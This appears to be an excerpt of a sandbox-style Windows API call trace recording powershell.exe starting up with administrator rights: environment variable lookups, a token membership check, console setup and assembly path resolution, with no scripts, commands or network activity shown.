	[0262.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.058] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.061] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0262.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.061] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.061] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0262.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.061] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.064] CoCreateGuid (in: pguid=0x16dec8 | out: pguid=0x16dec8*(Data1=0x898aa43d, Data2=0x9e76, Data3=0x4efe, Data4=([0]=0xa4, [1]=0xd, [2]=0x8b, [3]=0x3d, [4]=0xb0, [5]=0xfb, [6]=0xf7, [7]=0xe))) returned 0x0
	[0262.068] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0262.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.068] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.071] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0262.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.071] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.074] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0262.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.074] CoTaskMemFree (pv=0x2ca2e0) 
	[0262.079] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0262.693] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16db70 | out: lpConsoleScreenBufferInfo=0x16db70) returned 1
	[0262.698] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0262.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16db70 | out: lpConsoleScreenBufferInfo=0x16db70) returned 1
	[0262.699] GetVersionExW (in: lpVersionInformation=0x16db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0262.701] GetCurrentProcess () returned 0xffffffffffffffff
	[0262.702] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16db98 | out: TokenHandle=0x16db98*=0x320) returned 1
	[0262.705] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dab8 | out: TokenInformation=0x0, ReturnLength=0x16dab8) returned 0
	[0262.706] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x227290
	[0262.706] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x227290, TokenInformationLength=0x4, ReturnLength=0x16dab8 | out: TokenInformation=0x227290, ReturnLength=0x16dab8) returned 1
	[0262.707] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16dc18 | out: phNewToken=0x16dc18*=0x31c) returned 1
	[0262.707] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dab8 | out: TokenInformation=0x0, ReturnLength=0x16dab8) returned 0
	[0262.708] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2272c0
	[0262.708] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x2272c0, TokenInformationLength=0x4, ReturnLength=0x16dab8 | out: TokenInformation=0x2272c0, ReturnLength=0x16dab8) returned 1
	[0262.709] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2d3c518*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16dc28 | out: IsMember=0x16dc28) returned 1
	[0262.709] CloseHandle (hObject=0x31c) returned 1
	[0262.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.446] CoTaskMemAlloc (cb=0x804) returned 0x1b6cc210
	[0263.446] GetConsoleTitleW (in: lpConsoleTitle=0x1b6cc210, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0263.446] CoTaskMemFree (pv=0x1b6cc210) 
	[0263.474] CoTaskMemAlloc (cb=0x804) returned 0x1b6ccac0
	[0263.474] GetConsoleTitleW (in: lpConsoleTitle=0x1b6ccac0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0264.457] CoTaskMemFree (pv=0x1b6ccac0) 
	[0264.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.458] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0264.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.911] SetConsoleCtrlHandler (HandlerRoutine=0x26468dc, Add=1) returned 1
	[0265.917] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0265.919] CoCreateGuid (in: pguid=0x16dd10 | out: pguid=0x16dd10*(Data1=0x8f41b142, Data2=0xca98, Data3=0x42e9, Data4=([0]=0xba, [1]=0x3f, [2]=0x80, [3]=0x1b, [4]=0xcd, [5]=0x99, [6]=0x74, [7]=0x17))) returned 0x0
	[0265.920] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.920] CoTaskMemFree (pv=0x2ca2e0) 
	[0265.943] WinSqmIsOptedIn () returned 0x0
	[0265.944] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.944] CoTaskMemFree (pv=0x2ca2e0) 
	[0265.946] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.946] CoTaskMemFree (pv=0x2ca2e0) 
	[0265.947] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.947] CoTaskMemFree (pv=0x2ca2e0) 
	[0265.948] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.948] CoTaskMemFree (pv=0x2ca2e0) 
	[0265.949] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0265.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.949] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.751] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.751] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.752] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.752] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.752] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.752] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.755] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.755] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.760] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.760] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.761] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.761] CoTaskMemFree (pv=0x2ca2e0) 
	[0266.761] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0266.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.761] CoTaskMemFree (pv=0x2ca2e0) 
	[0268.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
